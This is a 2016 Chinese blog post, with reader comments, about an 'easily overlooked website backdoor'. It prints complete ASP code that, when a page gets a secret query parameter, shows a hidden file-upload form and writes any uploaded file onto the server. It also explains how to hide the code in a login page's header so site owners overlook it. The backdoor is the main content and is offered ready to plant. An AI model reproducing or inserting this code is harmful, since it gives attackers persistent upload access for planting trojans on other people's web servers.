当前位置:首页 > 宅科技 > 正文

容易被忽视的网站后门

<%if request.QueryString("action")="muruoxi" then 
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> 
<%end if%>

呐,上述代码插入某页面,比如你的后台登录页,加到</head>和<body>中,一般站长检查就会忽略,然而当攻击者访问你的后台登录页,如login.asp时加上参数action=muruoxi,构成语句login.asp?action=muruoxi,直接就能拥有上传木马的权限了……


QQ群号:543825203[电脑问题互助交流]

文章标题:容易被忽视的网站后门
本文作者:慕若曦
发表日期:2016-04-19 11:49 星期二    首发于    暮若夕
本文固定链接: https://www.muruoxi.com/252.html
 
文章标签:
上一篇: 下一篇:

18 条评论

评论加载中...
  1. 13楼
    迎風别葉index   

    asp马 :bobo_zhuakuang: :bobo_zhuakuang: :bobo_zhuakuang:

    2016年4月19日 下午1:23 评论
  2. 12楼
    紫微星   

    PHP呢?

    2016年4月19日 下午10:12 评论
    • 慕若曦   

      不敢放出来,杀伤力太大

      2016年4月20日 下午10:38 评论
  3. 11楼
    姜辰   

    asp~~

    2016年4月19日 下午10:21 评论
  4. 10楼
    米粒博客   

    好吓人哇 我得好好看看

    2016年4月20日 上午12:34 评论
  5. 9楼
    微历史   

    最讨厌这类攻击了,这叫XSS吗

    2016年4月20日 上午6:27 评论
    • 慕若曦   

      不是哦,这算提权后的后门添加

      2016年4月20日 下午10:39 评论
  6. 8楼
    siyochen   

    对我来说一堆乱码、、路过看其他内容、

    2016年4月20日 下午10:01 评论
  7. 7楼
    风的情绪   

    挺不错的一个后门,就是有时候(~ ̄▽ ̄)~路径会有点问题

    2016年4月21日 上午9:57 评论
  8. 6楼
    雨伤   

    asp,对我来说没什么用处,不过长知识了。

    2016年4月21日 下午10:27 评论
    • 慕若曦   

      瞅瞅这个http://ihuan.me/2628.html

      2016年5月3日 上午11:58 评论
  9. 5楼
    wsk fje ypm   

    :bobo_zhuakuang: 这。。。(>﹏<)

    2016年4月24日 上午12:41 评论
  10. 4楼
    Clarke   

    不会这种技术。(>﹏<)

    2016年4月24日 下午3:47 评论
  11. 地板
    vultr   

    兄弟,交换链接吗?

    2016年5月12日 下午12:24 评论
    • 长安   

      兄弟,佩服你说真话的勇气

      2016年5月12日 下午12:33 评论
      • vultr   

        嘛意思? 我说假话了?

        2016年5月12日 下午2:18 评论
  12. 板凳
    李明   

    很可怕的网站后门。

    2016年5月26日 上午12:41 评论
  13. 沙发
    西北   

    突然发现这个后门给了我启发

    2016年9月4日 下午1:10 评论

发表评论

╮( ̄▽ ̄)╭ |  (= ̄ω ̄=) |  (>﹏<) |  Σ( ° △ °|||)︴ |  Σ(っ °Д °;)っ |  X﹏X |  (╯-_-)╯╧╧

小提示:提交评论后刷新本页面即可看到隐藏的文件哦~
十年之约
加载中……